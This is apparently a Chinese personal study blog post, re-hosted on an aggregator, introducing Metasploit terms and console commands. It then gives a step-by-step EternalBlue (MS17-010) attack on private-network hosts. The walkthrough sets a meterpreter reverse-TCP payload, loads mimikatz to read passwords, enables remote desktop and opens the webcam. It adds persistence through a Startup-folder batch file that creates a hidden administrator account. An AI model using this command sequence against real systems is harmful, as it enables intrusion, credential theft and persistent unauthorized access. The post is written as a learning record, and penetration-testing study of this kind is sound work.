zoukankan      html  css  js  c++  java
  • Metasploit 介绍

     

     

     

    Metasploit 介绍

      Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

      

    1.   Metasploit简称msf

      2.  msf已经集成在kali 虚拟机中

      3.  msf 攻击脚本是Ruby 语言开发的,后缀名.rb

      4.   每一种攻击方式(或者漏洞),都至少对应这一个脚本

      5.   脚本的更新,用一个Ruby 直接放在msf 中对应的目录

      

    MSF

    启动msf

            命令行下:msfconsole

            图形界面:强烈不建议,因为涉及到数据库的问题,

            很多模块不太好找

    专业术语

       exploit

       攻击的意思,

      完整的漏洞利用程序,

      在MSF 中,攻击模块,也就是一个ruby 脚本

                

      payload

      攻击载荷

      在MSF 中,payload 代表本次渗透攻击之后,所执行的代码

                

      shellcode

       在MSF 中,在渗透攻击过程中,一组机器指令(16 进制的)。

                

      模块

       软件代码组件

                

      监听器

       等待网络连接的组件

                

    常用基本命令

        show exploits        显示所有的攻击模块

        show auxiliary        显示所有的辅助模块

        search ssh_version    搜索ssh_version 关键字

        use            使用某一个脚本

        back           回到主控路径

        show payloads       显示所有可用的payloads如果在某一个模块下使用该命令,当前模块可用的,并不是所有的

                            

        show options       查看相关模块的参数配置、

        show targets       显示受到漏洞影响的目标系统类型

        set payload        设置payload

        info            显示模块详细信息

        exploit          发起攻击

        run            运行扫描模块

        

        

        

    nmap 信息搜集

    nmap -sT -A --script=smb-vuln-ms08-067.nse -P0 172.18.199.29

    nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open

     


     

     

     

        

    永恒之蓝饰演:

    扫描:

    msfconsole # 进入MSF框架

    version # 确认下MSF的版本 4.11.17 以上

    search ms17_010 # 查找漏洞模块的具体路径

    use auxiliary/scanner/smb/smb_ms17_010 # 调用漏洞扫描模块

    show option # 查看模块配置选项

    set RHOST 192.168.1.1-254 # 配置扫描目标

    set THREADS 30 #配置扫描线程

    run #运行脚本

     

    调用exploit 攻击:

    use exploit/windows/smb/ms17_010_eternalblue

    set rhost 192.168.1.112

    配置攻击载荷

    set payload windows/x64/meterpreter/reverse_tcp

    set lhost 192.168.1.118

    查看参数配置配置 :

    show options

    发起攻击:

    exploit

     

    getuid     # 查询当前用户权限为SYSTEM,获取到到最高权限

    sysinfo     # 系统信息查询,当前系统为 Windows7

    screenshot   #桌面抓图

    load mimikatz  

     wdigest  查看密码

    run post/windows/manage/enable_rdp  开启远程桌面 

    webcam_scream  #视频开启

    shell            # 进入cmd

                   C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup  开机启动位置

     添加 psl.bat:

                   echo net user ppp 123.com /add >ppp.bat

                   echo net localgroup administrators ppp /add >>ppp.bat

                 

     

     

     

    本博客记录Sylon的学习总结和学习情况做记录 望今后能记录自己的学习之路,同时分享高品质博文!!!
  • 相关阅读:
    Struts2 Hello World
    Struts2入门(1)
    Struts2_day01
    Java Web Model2实战
    Oracle_day04
    SAP调用外部webservice接口
    通用清账程序
    服务器IDOC文件解析程序
    IDOC接口创建步骤
    SAP 本地发送IDOC
  • 原文地址:https://www.cnblogs.com/Sylon/p/11747472.html
Copyright © 2011-2022 走看看